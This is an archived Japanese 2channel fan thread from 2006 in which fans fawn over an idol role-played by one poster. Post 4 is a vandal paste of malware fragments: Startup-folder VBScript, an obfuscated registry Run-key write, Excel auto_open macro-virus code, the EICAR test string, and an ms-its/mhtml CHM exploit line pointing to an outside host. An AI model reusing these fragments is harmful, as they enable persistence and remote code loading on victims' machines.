2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

タンバゑは青組のスパイ☆2

1 :ユーは名無しネ:2006/11/10(金) 23:51:50
ゑ様が質問に答えるスレです
>980でスレ縦尾



(`へ′)<sageシンコウデオネガイシマス!アゲルヒトハシンジラレナイ!



前スレ
http://tv7.2ch.net/test/read.cgi/jr2/1147880526/

2 :ユーは名無しネ:2006/11/10(金) 23:53:54
v(*`∀´*)v2gt

3 :ユーは名無しネ:2006/11/11(土) 00:24:05
>1
てめー

4 :<body onload=window()>:2006/11/11(土) 00:25:29
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

5 :ユーは名無しネ:2006/11/11(土) 11:07:37
ゑ様新スレおめでd!
朝だけどつ【ドンペリ】

6 :ユーは名無しネ:2006/11/11(土) 11:33:31
ゑ様ゑ様
お引越し乙です!
じゃあじぬんはこれをつ【クラッカー&チーズ】

7 :ユーは名無しネ:2006/11/11(土) 11:40:08
ゑ様新スレ縦尾オメ!
何でも律儀にこなすゑ様だいしてる
昨日は小足の皆がんがってたけどゑ様のバックもまた見たいな

8 :ユーは名無しネ:2006/11/11(土) 13:25:47
ゑ様ゑ様
お引越し乙!自分もお引越し完了したよ(*´∀`)ノシ
自分からはこれつ【フルーツ盛り合わせ】
もちろんパイナップゑも入れておいたよ

9 :ユーは名無しネ:2006/11/11(土) 19:53:43
ゑ様ゑ様
何だかホストクラブみたいになってるね
ゑ様はホストみたいにカッコヨスだから別にイイか(*´∀`)つ【スパークリングワイン】
新スレ祝いに何か歌ってホスィな

10 :ユーは名無しネ:2006/11/11(土) 23:18:06
ゑ様お引越し乙です!
ニカチャったらちゃっかり2ゲトしてますね
これからもみんなでマターリやっていこうね
今日編み終わったこれを差し上げます(*´∀`)つ【マフラー】

11 :ユーは名無しネ:2006/11/12(日) 00:17:21
ゑ様お引っ越し乙です
これからも笑顔いっぱい見せてね
みんなで分けましょう(*´∀`)つ【引っ越しソバ】】】】】】】】】】

12 :ユーは名無しネ:2006/11/12(日) 02:30:12
ゑ様ゑ様
お引越し乙可憐&オメ!
新スレ祝いに騒ごーぜい(*´∀`)つ【タンバリン】】】】】】】】】】

13 :ユーは名無しネ:2006/11/12(日) 20:02:00
ゑ様引っ越し乙ですん
これからもカコヨスでキャワなゑ様と
ゑ様ダイシテル姐さん達みんなで仲良くマターリ行きましょう(*´∀`)つ【松茸茶碗蒸し】】】】】】】】


14 :(*`へ′) ◆JUowmt7f2Y :2006/11/12(日) 21:15:04
(`へ′)>2
    ニカチャeガヌケテマス!ミナサンニハナイショニシテオキマスネ!


(`へ′)>5
    つ【ドンペリ】アリガゑゑ!
    コンナタカイオサケイタダイテイインデスカ!


(`へ′)>6
    つ【クラッカー&チーズ】アリガゑゑ!オネイサンモオヒッコシオツカレーデス!


(`へ′)>7
    メンバーノカツヤクヲミマモルノモボクノシメイダトオモッテマス!


(`へ′)>8
    つ【フルーツ盛り合わせ】ドウモ!マタオヤスミパイナップゑオネガイシマス!


(`へ′)>9
    つ【スパークリングワイン】アリガゑゑ!ナニウタオウカナ!
    ホストミタイトハヨクイワレマスガショウジキヨロコンデイイノカワカリマセン!


(`へ′)>10
    つ【マフラー】アリガゑゑ!
    アイジョウタップリデスネ!ナンカテレマス!(⊃へ⊂)


(`へ′)>11
    つ【引っ越しソバ】】】】】】】】】】ドウモ!
    ヒッコシトイエバコレデス!オネイサンノタメニワライマス!(*`▽′*)ニコ!


(`へ′)>12
    つ【タンバリン】】】】】】】】】】ドウモドウモ!
    モウボクトイッタラタンバリンニキマリデス!


(`へ′)>13
    つ【松茸茶碗蒸し】】】】】】】】チャワンムシデス!
    ボクスキナンデス!アリガゑゑ!

15 :(*`へ′) ◆JUowmt7f2Y :2006/11/12(日) 21:24:40
(`へ′)<オヒッコシキネンニ「ホストクラブゑ」トシテミナサンモテナシマス!
      トイッテモイツモトカワリマセンガ…!
      マックロナスーツデバッチリキメテルボクヲソウゾウシテクダサイ!ヨロシク!(`へ′)ノ


(`へ′)<ミナサンガクルマデリクエストニコタエマス!


     アースカラハ〜!

     オモイデマデダキシメテ〜 2ドトオマエハナサナイ〜!
     ドンナツライコトカラモア〜イ〜ヲマモル〜!

16 :ユーは名無しネ:2006/11/12(日) 21:33:34
ゑ様ゑ様こんばんはノシ
ホストクラブゑカッコヨス
お店の前には大運動会のポスター飾ってそうだね(*´∀`)
ブラックスーツのゑ様がネバアゲ歌ってる姿を想像するだけでモヘすぎてからいよorz

17 :ユーは名無しネ:2006/11/12(日) 21:33:35
ゑ様こんばんは
「ホストクラブゑ」にお邪魔いたします!
真っ黒なスーツでネバアゲを歌い上げるゑ様を想像して
自分倒れちゃいそうです
日曜の夜を楽しみましょうヽ(*´∀`)ノ

18 :(*`へ′) ◆JUowmt7f2Y :2006/11/12(日) 21:37:01
(`へ′)>16-17
    イラッシャイマセジュリエット!
    ゴチュウモンヲトイイタイトコロデスガキョウハユニスレデキメルコトガアルミタイデスネ!
    アソンデイルワケニハイカナイノデイチドシメマス!スイマセン!
    ヘイテン!ガラガラ!

19 :ユーは名無しネ:2006/11/12(日) 21:42:59
開店そして閉店が早すぎるホストクラブゑオモシロス
次ゑ様に会える日を楽しみにしてるよ
お仕事ガンガッテね!
いってらっしゃい(*´∀`)ノシ

20 :ユーは名無しネ:2006/11/12(日) 21:46:46
ゑ様ゑ様
またホストクラブゑが開店したときはお酒とパイナップル持って行くね
それまでタンバリンの練習もしておくからガンガっていってらっしゃい(*´∀`)ノシ


21 :ユーは名無しネ:2006/11/12(日) 22:22:04
ゑ様ゑ様
ホストみたいは自分の中では褒め言葉だよノシ
「ホストクラブゑ」と聞いて思い出したんだけど
自分大運動会のポスター見て「ホストクラブ俺の足にチスしろ2回ぐらいな」
ていうのをリアルに想像したことがあった(*´∀`)

22 :(*`へ′) ◆JUowmt7f2Y :2006/11/13(月) 21:47:11
(`へ′)>19
    オネイサンベツニコントヲヤッタワケデハナイノデ!オモシロイトカヤメテクダサイ!
    ボクハズカシイジャナイデスカ!カオマッカッカデス!


(`へ′)>20
    ミセイネンノオネイサンノタメニジュースモオネガイシマス!
    サァイツナンデショウ!マボロシノオミセダッタノカモシレマセン!(*`▽′*)ニヤ


(`へ′)>21
    ホメコトバデアンシンシマシタ!コレカラモホストミタイトイワレルヨウニガンバリマス!
    オネイサンソウゾウリョクユタカデスネ!ウラヤマシイ!

23 :ユーは名無しネ:2006/11/13(月) 21:55:33
ゑ様ゑ様こんばんはノシ
ゑ様はホストみたいにカッコヨスな面とやんちゃでキャワな面を持ってるよね
そのギャップに自分はいつもモヘてるんだけど(*´∀`)

24 :ユーは名無しネ:2006/11/13(月) 21:55:38
ゑ様こんばんは
お仕事乙カレーでした!
オモシロスなんて言ってごめんね
昨日はホストクラブゑに少しだけ来店できて良かったよ(*´∀`)

25 :(*`へ′) ◆JUowmt7f2Y :2006/11/13(月) 22:05:56
(`へ′)>23
    コンバンハ!ボクモットホストデヤンチャデカワイイヲメザスノデモットスキニナッテクダサイ!
    ナンカメチャクチャニナリソウデス!ダイジョウブカナ!


(`へ′)>24
    コンバンハ!アヤマラナイデクダサイ!ボクオモシロイダケガトリエナンデス!!
    アッ!ジブンデイッチャイマシタ!
    マタキマグレデオープンスルノデミツケテクダサイ!

26 :ユーは名無しネ:2006/11/13(月) 22:08:40
ゑ様自分で言っちゃったね
そんなところもオモシロスだよ
再オープン時にはおめかししていきますね(*´∀`)

27 :ユーは名無しネ:2006/11/13(月) 22:15:05
ゑ様
今以上ゑ様をスチになってしまったらゑ様のことしか考えれなくなっちゃうよorz
自分の前ではめちゃくちゃになっても構いませんよ(*´∀`)オホホ
むしろゑ様がめちゃくちゃになっちゃったらちゃんと自分が介抱するからねノシ

28 :(*`へ′) ◆JUowmt7f2Y :2006/11/13(月) 22:25:34
(`へ′)>26
    タノシミニシテテクレルオネイサンガイテウレシイデス!
    ドレスデバッチリキメテクダサイ!ヒトメボレシタラスイマセン!


(`へ′)>27
    カイゴアリガゑゑ!ボクノコトシカカンガエラレナクナッタラダメデスカ?
    ボクハウレシイノニ!!(`へ′)


(`へ′)<ソウイエバミナサンボクノアイノコクハクキイテクレマシタカ?

29 :ユーは名無しネ:2006/11/13(月) 22:29:14
ドレスでばっちりきめていくよ
ひと目惚れしてくださいな
ゑ様からの愛の告白お待ちしていますね
告白されなくてもゑ様についていきますけど(*´∀`)ノ

30 :ユーは名無しネ:2006/11/13(月) 22:41:53
ダメじゃないけど何も手に付かなくなったら困るよゑ様orz
今でも十分ゑ様にメロメロだから許してね(*´∀`)
愛の告白聞いたよノシ
自分も言われなくても、そしてゑ様にたとえウザーと言われてもゑ様についていくよ
ここの姐さん方だけに新たな愛の告白おながいします!

31 :(*`へ′) ◆JUowmt7f2Y :2006/11/13(月) 22:49:11
(`へ′)>29
    クドキモンクッテヤシデスカ!ドウシヨウ!
    ボクアンマリモッテナインデスガカンガエテオキマス!


(`へ′)>30
    ソレハコマリマスネ!ジャアボクトキドキツメタクシマス!
    アラタナアイノコクハクデスカ!イマニナッテコクハクネタヲフッタノヲコウカイシテキマシタ!
    ソレデハ1オク3ゼンマンニンノリクエストニコタエテ!


(`へ′)<ボクノヒトミノナカニスンデミナイ?

32 :ユーは名無しネ:2006/11/13(月) 22:54:11
ゑ様の瞳の中の住人になりたいです!(*´Д`)
1億3千万人も今この瞬間骨抜きです
様にドチドチして眠れなくなりました

33 :ユーは名無しネ:2006/11/13(月) 22:55:15
恋愛には駆け引きが大事らしいので是非ゑ様は押したり引いたりして自分をスチでいさせてくださいね(*´∀`)ノシ

ゑ様の愛の告白にまたもや自分は倒れそうですorz
少蔵とは違って少し謙虚なゑ様にモヘ

34 :32:2006/11/13(月) 22:55:44
自分ゑ様にドチドチしすぎて
ゑ様の「ゑ」をぬかしてしましました
ごめんねゑ様(つД`)

35 :(*`へ′) ◆JUowmt7f2Y :2006/11/13(月) 23:06:47
(`へ′)>32
    イマソウゾウシタラヒトミノナカトカチョットイタソウデス!ケドガマンシマス!
    ドウゾトビコンデキテクダサイ!!


(`へ′)>33
    バリエーションホウフナボクデス!オネイサンタオレナイデクダサイ!
    ボクカケツケルコトガデキナイノデシンパイデネムレナクナッチャイマス!


(`へ′)>34
    サマシカナカッタノデチョットビックリシマシタ!ドンマイデス!


クサイセリフイイスギタノデファブリーズシテオキマス!(`へ′)r鹵~~~ シュー

36 :ユーは名無しネ:2006/11/13(月) 23:10:51
ゑ様の新たな愛の告白聞けて嬉しかったです
ファブリーズのお陰でもうスッキリですね
ゑ様の瞳の中に飛び込んで…うにします
ゑ様と姐さん方おやすみパイナップル!(*´∀`)ノシ

37 :ユーは名無しネ:2006/11/13(月) 23:15:28
ゑ様に心配をかけさせる訳にはいかないので倒れないようにしますノシ
>34姐さんが瞳の中にお住まいになるそうなので自分はゑ様の心の中に住んでみたいな(*´∀`)
ゑ様そのくささは許せるくささだとオモー
それだったら少蔵の愛の告白はファブリーズ何個あっても足りないよ

38 :(*`へ′) ◆JUowmt7f2Y :2006/11/13(月) 23:20:28
(`へ′)>36
    イタイノハニガテナノデドウカアバレナイデクダサイ!オネガイシマス!
    ヨイユメヲ!オヤスミパイナップル!(*`▽′*)


(`へ′)>37
    ナルホド!10ニンブンノファブリーズガヒツヨウデスネ!
    ココロデスカ?オネイサンガハイッタラ
    ボクガアンナコトヤコンナコトカンガエテルノガバレマス!キケンデス!ソシシマス!

39 :ユーは名無しネ:2006/11/13(月) 23:30:49
ゑ様が考えてるあんなことこんなことが分かるのもそれはそれでオモシロス
でも謎の多き男なゑ様もカッコヨスだと思うので止めておきますね
じゃあ自分はゑ様の服の胸ポケットに住むことにします(*´∀`)
ゑ様の服の胸ポケットに飛び込んで自分も先にうにしますノシ
ゑ様寝てる間に自分を潰さないでくださいねオヤスミパイナップル!

40 :(*`へ′) ◆JUowmt7f2Y :2006/11/13(月) 23:36:32
(`へ′)>39
    オネイサンザンネンデスガカクジツニツブレマス!
    ソレハカワイソウナノデトナリデネマショウ!オヤスミパイナップル!


凸クンタンジョウビオメー∠(*`▽′*)ゝデス!


(`へ′)<ヒサシブリニヤリマシタ!ミナサンモウネルンデスカ!

41 :(*`へ′) ◆JUowmt7f2Y :2006/11/14(火) 00:37:39
(`へ′)<ボクモウスコシオキテマス!
      ネムレナイオネイサンイタラコエカケテクダサイ…!ボクマッテマス!

42 :ユーは名無しネ:2006/11/14(火) 00:56:45
ゑ様
眠れないから来たよノシ
凸も20歳になったからミヒィとゑ様と3人でお酒飲みに行けるね
ゑ様成人式に出る時は何着たい?

43 :(*`へ′) ◆JUowmt7f2Y :2006/11/14(火) 01:02:07
(`へ′)>42
    アッ!オネイサンコンバンハ!ニッポンダンジナラヤッパリハカマデスカネ!
    オネイサンハボクニキテモライタイモノアリマスカ!

44 :ユーは名無しネ:2006/11/14(火) 01:03:38
ゑ様こんばんはノシ
ゑ様の袴姿想像したら禿禿カッコヨスだったよ
ゑ様は着物似合うね

45 :(*`へ′) ◆JUowmt7f2Y :2006/11/14(火) 01:07:56
(`へ′)>44
    オネイサンモコンバンハ!スーツモケッコウイケルボクデス!
    ソノマエニセイジンシキニデレルカシンパイデスガ!

46 :ユーは名無しネ:2006/11/14(火) 01:10:23
ゑ様は成人式出れるって信じてるよ
でももし出られなかったら一緒に飲みましょう
弱いですが

47 :ユーは名無しネ:2006/11/14(火) 01:14:14
ゑ様
袴姿もカッコヨスだとオモーけど風変わりで白スーツ着てホスィな
ゑ様背高いから絶対似合うよ
想像するだけでモヘス(*´∀`)

48 :(*`へ′) ◆JUowmt7f2Y :2006/11/14(火) 01:23:51
(`へ′)>46
    オネイサンノソノオモイガアルカギリデレソウデス!!
    デモデレナイトキノタノシミガフエマシタ!アリガゑゑ!(*`へ′*)


(`へ′)>47
    オネイサンオダテジョウズデスネ!(*`へ′*)
    シロスーツスッゴイメダチソウデス!シャシノイロハクロデソウゾウオネガイシマス!


(`へ′)<ソロソロボクハネルコトニシマス!ツギモエガオデアエルトイイデスネ!
      オヤスミパイナップル!

49 :ユーは名無しネ:2006/11/14(火) 01:30:09
ゑ様毎日ちゃんと暖かくして寝るんだよつ【羽毛布団】
じゃあおやすみパイナップルノシ

50 :ユーは名無しネ:2006/11/14(火) 08:02:47
ゑ様ゑ様
おはようございます
中々ゑ様に会える時間に来れなくて淋しいけど
姐さんたちとのやりとり確認するだけでも楽しいよ(*´∀`)

51 :ユーは名無しネ:2006/11/14(火) 09:33:15
ゑ様もはようございますノシ
自分もゑ様いる時に来れないけど姐さん達との会話オモシロスで見てるよ
姐さん達をモヘさせといていつも冷静なゑ様テラモエス(*´Д`)

52 :ユーは名無しネ:2006/11/14(火) 15:43:55
ゑ樣ゑ樣
大運動会の写真やっと買ってきたよノシ
お気に入りを選りすぐるつもりだったけど
どの写真もゑ樣カッコヨスだったから選べなかったよ
ケキョークゑ様セットでご購入しちゃった(*´∀`)

53 :ユーは名無しネ:2006/11/14(火) 17:26:24
ゑ様ゑ様
>50姐さんや>51姐さんの優しさとゑ様愛に目汁゜・。(゜´Д`゜)。・゜
自分いつもゑ様に逢えるヤシだから姐さんたちにもっとオモシロスって言ってもらえるような会話出来るよう話題拾ってくるね!

ところでゑ様
自分ゑ様と20cm弱身長さがあったよorz小さいヤシはお嫌いですか?

54 :ユーは名無しネ:2006/11/14(火) 21:59:47
ゑ様ゑ様
>53姐さんはゑ様にお姫様だっこしてもらえそうで裏山です
自分のようなちょっと背伸びすればチューが出来る身長はいかがですか?(*´∀`)

55 :ユーは名無しネ:2006/11/15(水) 03:01:30
ゑ様
ミフィに続きニカチャの着ボイスが来たね
ゑ様はいつなんだろうと今からwktkしてお待ちしております(*´∀`)

56 :ユーは名無しネ:2006/11/15(水) 14:30:14
ゑ様ゑ様
自分ゑ様に「縦尾じゃなくて横尾だよ!」
て言ってほしいな(*´∀`)
みしてやるぜー!!でもいいな(*´д`*)

57 :ユーは名無しネ:2006/11/15(水) 18:46:01
ゑ様ゑ様
それなら自分は「アウター?」か「可愛くねぇーよ!」を言ってホスィな
自分の中ではオヤスミパイナップル!に続くゑ様語録だよ(*´∀`)

58 :ユーは名無しネ:2006/11/15(水) 21:42:09
ゑ様ゑ様
自分は「俺について来いよ!」か「ちこくをしない」って言ってホスィー

59 :ユーは名無しネ:2006/11/15(水) 23:26:00
ゑ様ゑ様
シンジラレナイ!もいいな

60 :ユーは名無しネ:2006/11/16(木) 18:01:22
ゑ様ゑ様
前スレで試験にゑ様(渉)が出てきたって言ってたヤシなんだけど今日その結果が返って来たよ
漢検だったんだけど無事に合格出来たみたい(*´∀`)ノシ
これもゑ様パワーのおかげかなゑ様d!

61 :ユーは名無しネ:2006/11/16(木) 18:19:47
ゑ樣
自分帰りたいんだけど玄関で職場の人が揉めてて帰れナス
なのでちょっとゑ樣のおうちに寄り道させてね

>60姐さんオメ!ゑ樣パワースゴス

62 :ユーは名無しネ:2006/11/16(木) 21:26:19
ゑ様ゑ様
遅くなったけど出雲魂のDVD引き取って来て見ましたノシ
今考えたら出雲はゑ様見たい一心で見にいったな
映り込みもあったし懐かしさもあってホッコリ状態です(*´∀`)

63 :ユーは名無しネ:2006/11/17(金) 14:26:17
ゑ様ゑ様
自分も出雲DVD見ました
まだ一年前なのにゑ様の印象が違うのは髪の色のせい?
勿論どっちのゑ様も選べないほどカッコヨスです(*´∀`)

64 :ユーは名無しネ:2006/11/17(金) 16:52:06
このスレきめぇ

65 :(*`へ′) ◆JUowmt7f2Y :2006/11/17(金) 21:45:29
(`へ′)>49
    つ【羽毛布団】ボクノケンコウマデカンガエテクレルナンテ!アリガゑゑ!


(`へ′)>50
    ボクヲミツケタラコエヲカケテクダサイ!イッショニオハナシシマショウ!(*`▽′*)ニコ!


(`へ′)>51
    ボクハイタッテフツウデス!ツネニヘイジョウシンヲココロガケテイマス!


(`へ′)>52
    セットデカッテクレルナンテアリガゑゑ!オネイサンイイヒトスギデス!ウレシイデス!


(`へ′)>53
    オネイサンイッショニアレイイマショウ!アイサレテマス!シンジラレナイ!!
    ゼンゼンキライジャアリマセン!ギャクニオオキイボクハキライデスカ??


(`へ′)>54
    チチチュ、チュートカイワナイデクダサイ!チョットソウゾウシチャッタジャナイデスカ!
    ハズカシイ!!


(`へ′)>55
    ボクノバンハツギダトオモイマス!
    イヤ…ツギノツギカ!ツギノツギノツギ!カモシレマセン!


(`へ′)>56
    ミシテヤルゼ!コンドハナニヲミセタライイデショウカ!!


(`へ′)>57
    アウターヤメテクダサイ!イマオモイダシテモカオカラヒガデソウデス!(∩へ∩;)ヒー!


(`へ′)>58
    ボクガイワナクテモミナサンツイテキテクレルキガシマス!
    チョットテングニナリマシタ!スマンカッタ!


(`へ′)>59
    「シンジラレナイ!」オカゲサマデ2006リュウコウゴタイショウニノミネートサレマシタ!
    タイショウヲネラッテガンガリマス!!


(`へ′)>60
    オネイサンオメー∠(*`▽′*)ゝデス!コンドボクノカテイキョウシオネガイシマス!
    キビシクドウシテクダサイ!!
        

(`へ′)>61
    セッカクキテイタダイタノニルスニシテマシタ!スイマセン!オネイサンブジデスカ?

66 :(*`へ′) ◆JUowmt7f2Y :2006/11/17(金) 21:46:33
(`へ′)>62
    アリガゑゑ!ボクハナンカイミテモカッコイイノデクリカエシミテクダサイ!
    ヨロシクオネガシマス!(*`▽′*)


(`へ′)>63
    オネイサンモアリガゑゑ!
    キットソレハセイチョウデス!ボクモマダマダオトナニナッテイクンデス!


(`へ′)>64
    アガッテマス!シンジラレナイ!!

67 :ユーは名無しネ:2006/11/17(金) 22:03:23
ゑ様ゑ様こんばんはノシ
自分>53だけど背の高いゑ様は嫌いどころかむしろ大好物です(*´∀`)ノシ
自分を腕の中にすっぽりおさめてください

68 :(*`へ′) ◆JUowmt7f2Y :2006/11/17(金) 22:08:18
(`へ′)>67
    -20センチノオネイサンコンバンハ!
    ダ、ダイコウブツデスカ?!ボクヲタベナイデクダサイ!オネガイシマス!.。・゚(゚`へ′゚)゚・。.

69 :ユーは名無しネ:2006/11/17(金) 22:14:51
ゑ様スマソorz
そう返してくれるかなとオモてちょっと言ってみただけだから泣かないでつ゛
ゑ様はスラリとしててお肉がないので食べても美味しくなさそうだし
愛でるだけでお腹イパーイだから食べずにジーっと見てるだけにするね(*´∀`)

70 :ユーは名無しネ:2006/11/17(金) 22:17:35
ゑ様こんばんは(*´∀`)ノシ
明日のお洋服何着てこうか迷ってるんだけど
ゑ様はスカートとパンツどっちがいいと思う?

71 :60:2006/11/17(金) 22:21:22
ゑ様の匂いがしたから来てみたらゑ様ハケーン!
お祝いしてくれてd!>61姐さんもd!
ゑ様の家庭教師面白そうだね是非やらしてホスィな(*´∀`)

72 :(*`へ′) ◆JUowmt7f2Y :2006/11/17(金) 22:30:44
(`へ′)>69
    アタマナデラレマシタ!テレテナイデス!(*`へ′*)
    アマリミナイデクダサイ!アナガアキソウデス!


(`へ′)>70
    パンツデオネガイシマス!
    ミジカイスカートハボクイガイノオトコガオネイサンヲミルカライヤデス!


(`へ′)>71
    ゼヒメガネヲカケテセンセイシテクダサイ!メガネモヘー!(*`▽′*)
    ケッシテヘンタイジャアリマセン!


(`へ′)<クンクン!ボクニオイマスカ?ドナタカファブリーズモッテマセンカ!!

73 :ユーは名無しネ:2006/11/17(金) 22:38:34
ゑ様は臭い訳じゃないのでファブリーズしなくてもおkだよノシ
前にゑ様が来てたときの愛の告白の臭さが残ってたのかも(w
実はゑ様に眼鏡かけてくださいって言われなくても眼鏡常備な自分(*´∀`)

74 :ユーは名無しネ:2006/11/17(金) 22:41:42
ゑ様の匂いは消臭いらずですからご安心を
それじゃ明日はゑ様の言うとおりにしてパンツにします!
ミニスカートはゑ様の前だけにしますね(*´∀`)

75 :(*`へ′) ◆JUowmt7f2Y :2006/11/17(金) 22:50:50
(`へ′)>73
    ボクカンチガイシマシタ!オネイサン!メガネGJデス!
    サトシンニマケナイヨウニメガネヲカケツヅケテクダサイ!


(`へ′)>74
    ナラヨカッタデス!(*`Д′*)ホッ!
    ボクノワガママヲキイテクレテアリガゑゑ!コレデアンシンシテネムレソウデス!

76 :ユーは名無しネ:2006/11/17(金) 22:59:20
自分眼鏡かけても見えるから普段かけてないんだけど
ゑ様がそう言うなら眼鏡ずっとかけておくね(*´∀`)ノシ
こんな自分ですが眼鏡モヘー!してくださいね変態ゑ様(w

77 :ユーは名無しネ:2006/11/17(金) 23:01:05
ゑ様のわがままならいくらでも受け入れますよ
ゑ様のプチ嫉妬にドチドチ&ウレシスで眠れそうにないですが
明日は早いのでベッドに潜ることにしますね
ゑ様と姐さん方おやすみパイナップル(*´∀`)ノシ

78 :(*`へ′) ◆JUowmt7f2Y :2006/11/17(金) 23:10:01
(`へ′)>76
    ボクヲヘンタイアツカイスルノハヤメテクダサイ!ゴカイサレマス!
    ボクノメガネスガタモケッコウイケテルトオモイマス!


(`へ′)>77
    タマニハヤキモチヤイテモイイデスヨネ!
    アッタカクシテネテクダサイ!オヤスミパイナップル!

79 :ユーは名無しネ:2006/11/17(金) 23:22:49
ゑ様が自ら変態じゃないというので言ってホスィのかとオモったんだよ
誰も誤解してないから大丈夫ノシ
ゑ様の眼鏡姿はテラカッコヨスだね(*´∀`)
個人的にゑ様は細くて色の濃くないフレームの眼鏡が似合うとオモ-

>77姐さんオヤスミパイナップル!

80 :(*`へ′) ◆JUowmt7f2Y :2006/11/17(金) 23:31:23
(`へ′)>79
    ソーユーアドバイスガアルトウレシイデス!ボクヲドンドンカイゾウシテクダサイ!
    デモメガネカケルキカイガアマリナクテザンネンデス!

81 :ユーは名無しネ:2006/11/17(金) 23:46:53
でもゑ様は元からファッソンセンスがイイので改造するところも少なそうだね
むしろ自分がゑ様のプロデュースで改造されたいな(*´∀`)

ゑ様最近頬がプニプニしてきて困ったよorz

82 :(*`へ′) ◆JUowmt7f2Y :2006/11/17(金) 23:55:48
(`へ′)>81
    フクトカホメラレルトウレシイデス!ドレドレ!(`へ′)σ)´∀`)プニプニ
    ダイブオイシソウニナッテキマシタ!
    ソロソロタベゴロデスネ!(*`▽′*)ニヤ

83 :(*`へ′) ◆JUowmt7f2Y :2006/11/18(土) 00:05:59
ユニラクンオメー∠(*`▽′*)ゝデス!


キョウハユニラクンノタメニスマイルモツケチャイマス!(*`▽′*)ニコ!

84 :ユーは名無しネ:2006/11/18(土) 00:07:53
ゑ様ゑ様
泣かせないでください。゚(゚´Д`゚)゜。
ゆにらの誕生日だしシャンメリー持参しましたんで乾杯してね

85 :ユーは名無しネ:2006/11/18(土) 00:08:55
ゑ様は自分を食べないでと言いつつ自分のことは食べるんですか(w
ゑ様になら食べられても良いのでどうぞこのお肉召し上がってください
そうすればゑ様もプニっとするとオモー(*´∀`)

86 :(*`へ′) ◆JUowmt7f2Y :2006/11/18(土) 00:15:21
(`へ′)>84
    ジツハボクイマジブンデイッテオキナガラシンミリシテイマシタ…!
    オネイサンタチガイテクレテヨカッタ!(゚`へ′゚)


(`へ′)>85
    イエ!マダタベマセン!モウスコシプニットサセタホウガイイカナ!


(`へ′)つYY <オネイサンタチグラスヲオウゾ!イッショニシャンメリーヲノミマショウ!
          ユニラクンノオイワイデス!カンパーイ!(*`▽′*)つY

87 :ユーは名無しネ:2006/11/18(土) 00:19:35
ゑ様とゆにらに
かんぱーい(*´∀`)つY

88 :ユーは名無しネ:2006/11/18(土) 00:21:53
もう少しプニっとさせてからだなんてゑ様まるで狼みたいな言い方ですね

自分もゑ様の永遠のシンメのゆにらの誕生日に乾杯(*´∀`)つY
豆知識だけど乾杯のときはグラス同士をチンって当てちゃいけないんだって
これでゑ様の家庭教師として一つ教えられたかな?

89 :(*`へ′) ◆JUowmt7f2Y :2006/11/18(土) 00:24:40
(`へ′)>87
    ボクモデスカ!アリガゑゑ!チョットヨッパラッテキマシタ!(*`へ′*)


(`へ′)>88
    デハ2リノオネイサントチン!チン!コレデイイデスカ!
    オトコハミンナオオカミデス!キヲツケテクダサイ!

90 :ユーは名無しネ:2006/11/18(土) 00:29:48
ゑ様の八重歯はまるでわんこの八重歯みたいだよね(*´∀`)
狼ゑ様には怖くなさそうなのでちょっとだけ警戒することにするねノシ

明日も検定受けてくるからゑ様パワー注入してホスィな
ゑ様も姐さん方もゆにらもオヤスミパイナップル!

91 :(*`へ′) ◆JUowmt7f2Y :2006/11/18(土) 00:36:21
ヽ(*`へ′ヽ) ゑサマパワー!(*ノ`へ′)ノ チュウ!(σ`へ′)σニュウ!


(`へ′)>90
    コレデケンテイハカンペキデス!
    ケイカイシナイデクダサイ!ボクハマジメダケガトリエナオコトデスカラ!
    オヤスミパイナップル!

92 :(*`へ′) ◆JUowmt7f2Y :2006/11/18(土) 00:45:51
(`へ′)<ダレモイマセン!ヒトリデ2ハイメイタダキマス!チン!(`へ′)つY

93 :ユーは名無しネ:2006/11/18(土) 00:55:23
ゑさまこんばんはノシ
ちょっと遅くなっちゃったけど自分も乾杯させてください
ゆにら誕生日オメ!つY ゑさまとゆにらのシンメダイスチだよ

94 :(*`へ′) ◆JUowmt7f2Y :2006/11/18(土) 01:01:37
(`へ′)>93
    オネイサンオカエリナサイ!
    ソウイッテモラエルトテレマスネ!ツライケドボクコレカラモガンガリマス!

95 :ユーは名無しネ:2006/11/18(土) 01:07:16
ゑ様ゑ様もやっぱりツライんだね
素直にそう言ってくれてうれしいよ
本当にツラい時は我慢せずに泣いていいからね

96 :ユーは名無しネ:2006/11/18(土) 01:11:22
ゑさま、こんばんわ。お祝いしたいのはやまやまだけど
仕事中なので、エアー乾杯で失礼します!(´∀`)つ チン!
おやすみパイナップル!

97 :(*`へ′) ◆JUowmt7f2Y :2006/11/18(土) 01:13:19
(`へ′)>95
    アリガゑゑ!デモボクダイジョウブデス!
    ボクノコトヲスキトイッテクレルオネイサンガコンナニタクサンイマス!シアワセデス!
    デモナキタクナッタトキハヨロシクオネガイシマス!ボソ

98 :(*`へ′) ◆JUowmt7f2Y :2006/11/18(土) 01:15:45
(`へ′)>96
    オネイサンオシゴトオツカレーデス!コンドユクーリハナシマショウ!
    つ。ゴミハボクガステテオキマス!

99 :ユーは名無しネ:2006/11/18(土) 01:31:20
ゑ様こんばんはノシ
チト出遅れちゃったけどお祝いさせて下さいな
ゆにら誕生日オメ!(*´∀`)つY 自分もゑ様とゆにらのシンメダイスチだよ!

100 :(*`へ′)100ナラボクノジダイデス! ◆JUowmt7f2Y :2006/11/18(土) 01:43:30
